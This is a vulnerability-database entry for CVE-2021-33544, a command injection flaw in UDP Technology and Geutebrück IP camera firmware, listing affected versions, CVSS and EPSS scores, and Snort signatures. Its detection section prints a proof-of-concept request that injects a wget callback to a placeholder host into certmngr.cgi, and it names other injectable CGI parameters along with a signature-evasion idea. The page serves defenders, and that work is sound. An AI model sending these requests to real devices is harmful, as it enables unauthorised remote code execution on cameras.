cbcvebase.
CVE-2021-33544
published 2021-09-13

CVE-2021-33544: Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute…

PriorityP181high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
94.62%
99.8th percentile
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

Affected

66 ranges· showing 25
VendorProductVersion rangeFixed in
geutebr_cke2_series
geutebr_cke2_series
geutebr_cke2_series
geutebr_cke2_series
geutebr_cke2_series
geutebr_cke2_series
geutebr_cke2_series
geutebr_cke2_series
geutebr_cke2_seriesEBC-21xx – 1.12.0.27
geutebr_cke2_seriesEFD-22xx – 1.12.0.27
geutebr_cke2_seriesETHC-22xx – 1.12.0.27
geutebr_cke2_seriesEWPC-22xx – 1.12.0.27
geutebr_ckencoder_g-code
geutebr_ckencoder_g-code
geutebr_ckencoder_g-code
geutebr_ckencoder_g-code
geutebr_ckencoder_g-codeEEC-2xx – 1.12.0.27
geutebr_ckencoder_g-codeEEN-20xx – 1.12.0.27
geutebrueckg-cam_ebc-2110_firmware<= 1.12.0.27
geutebrueckg-cam_ebc-2110_firmware
geutebrueckg-cam_ebc-2110_firmware
geutebrueckg-cam_ebc-2111_firmware<= 1.12.0.27
geutebrueckg-cam_ebc-2111_firmware
geutebrueckg-cam_ebc-2111_firmware
geutebrueckg-cam_ebc-2112_firmware<= 1.12.0.27

Detection & IOCsextracted from sources · hover to see the quote

url//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
path/uapi-cgi/certmngr.cgi
path/testcmd.cgi
path/simple_reclistjs.cgi
path/factory.cgi
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/certmngr.cgi?action=createselfcert&"; fast_pattern; content:"&state=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033295; rev:2;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033305; rev:1;)
snort
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033304; rev:1;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/simple_reclistjs.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033303; rev:1;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/factory.cgi?"; fast_pattern; content:"preserve=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033297; rev:1;)
  • Exploit targets the `state` parameter of certmngr.cgi with a shell command substitution payload (e.g., `$(...)`). Look for `&state=$` (URL-encoded as `&state=%24`) in HTTP GET requests to /certmngr.cgi.
  • Exploit targets the `command` parameter of testcmd.cgi with a shell command substitution payload. Look for `command=$` (URL-encoded as `command=%24`) in HTTP GET requests to /testcmd.cgi, both inbound and outbound.
  • Exploit targets the `date` parameter of simple_reclistjs.cgi with a shell command substitution payload. Look for `date=$` in HTTP GET requests to /simple_reclistjs.cgi.
  • Exploit targets the `preserve` parameter of factory.cgi with a shell command substitution payload. Look for `preserve=$` in HTTP GET requests to /factory.cgi.
  • The Nuclei PoC uses an out-of-band (OAST/interactsh) HTTP callback via a `wget` command injected into the `state` parameter to confirm exploitation. Monitor for unexpected outbound HTTP connections from camera devices.
  • All exploit attempts use HTTP GET method against the vulnerable CGI endpoints. Unauthenticated access is possible — no authentication headers are required in the PoC request.
  • ·The Nuclei template uses `interactsh-url` as a placeholder for an out-of-band interaction server. The detection matcher only confirms exploitation via an HTTP callback (`interactsh_protocol: http`), meaning blind/non-OAST environments will not trigger the matcher.
  • ·The ET Snort rules use `|24|` as the hex representation of the `$` character to detect shell command injection. Attackers using alternative injection syntaxes (e.g., backticks) may evade these signatures.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.